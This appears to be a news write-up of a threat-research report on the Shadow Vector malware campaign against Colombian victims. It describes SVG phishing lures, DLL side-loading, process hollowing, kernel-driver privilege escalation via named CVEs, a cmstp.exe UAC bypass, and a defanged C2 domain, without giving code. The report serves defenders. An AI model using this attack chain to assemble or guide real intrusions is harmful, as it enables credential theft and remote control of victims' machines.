Ddos 
The Acronis Threat Research Unit (TRU) has uncovered a stealthy and technically mature malware campaign dubbed Shadow Vector, targeting victims in Colombia. What sets this campaign apart is its use of malicious SVG (Scalable Vector Graphics) files as phishing lures—part of a broader evolution in smuggling techniques to deliver Remote Access Trojans (RATs), steal credentials, and evade detection.
“Shadow Vector blends traditional social engineering, public infrastructure abuse and stealthy execution techniques,” notes the report, “reflecting a high level of operational flexibility and an evolving technical maturity of regional threat actors in Latin America.”
The campaign begins with a carefully crafted phishing email impersonating Colombia’s labor courts, attaching what appears to be a legitimate court notice. In reality, the attachment is a malicious SVG file that bypasses traditional email security controls and delivers links to stagers or password-protected ZIP payloads hosted on trusted platforms like Dropbox, Bitbucket, or Discord CDN.
These files contain legitimate-looking executables alongside weaponized DLLs, delivering RATs like AsyncRAT and RemcosRAT via DLL side-loading or driver-based privilege escalation.
Once extracted, the malware uses a technique involving a decoy executable and a rogue mscorlib.dll, which appears benign but is in fact malicious.
“The attack uses DLL side loading, where the clean-looking executable loads the malicious DLL and starts the AsyncRAT infection process.”
The malware then hollows out a legitimate process (AddInProcess32.exe) and injects its payload to operate invisibly under the context of a trusted binary.
In more advanced cases, Shadow Vector includes vulnerable kernel drivers, such as those from WiseCleaner (CVE-2023-1486) and Zemana (CVE-2022-42045), to gain system-level privileges.
“Both vulnerable drivers are launched as kernel-mode services… used for kernel-level privilege escalation.”
Once installed, RemcosRAT enables complete control over the victim’s machine, with capabilities ranging from keylogging to remote desktop access and browser credential theft.
The latest iteration introduces Katz Loader, a dynamic .NET payload that runs entirely in memory, fetched from services like Paste.ee or the Internet Archive.
“This loader is delivered through a multistage infection chain… and executes payloads dynamically and entirely in memory, leaving minimal traces behind.”
The loader employs:
- UAC bypass via cmstp.exe
- Anti-analysis and sandbox detection
- Base64 payloads hidden inside image files
- Persistence via scheduled tasks and obfuscated registry paths
Portuguese-language strings in the loader suggest ties to Brazilian banking malware ecosystems, possibly pointing to shared codebases or cross-regional collaboration.
The campaign’s final payloads include a rich configuration decrypted from embedded resources. These settings control:
- C2 communication endpoints (asynk02[.]duckdns[.]org)
- Installation behavior and persistence methods
- Plugins for clipboard hijacking, browser token theft, and cryptocurrency wallet hunting
Each infection transmits victim metadata and maintains a keylogger thread, watching every keystroke and monitoring screen activity.
Shadow Vector represents a disturbing leap in phishing sophistication—weaponizing trust, abusing public infrastructure, and innovating on malware deployment with near-forensic precision.
“While its current use centers on stealing sensitive and confidential data,” the report warns, “its capabilities suggest potential for expansion into more destructive actions such as ransomware deployment.”
Donate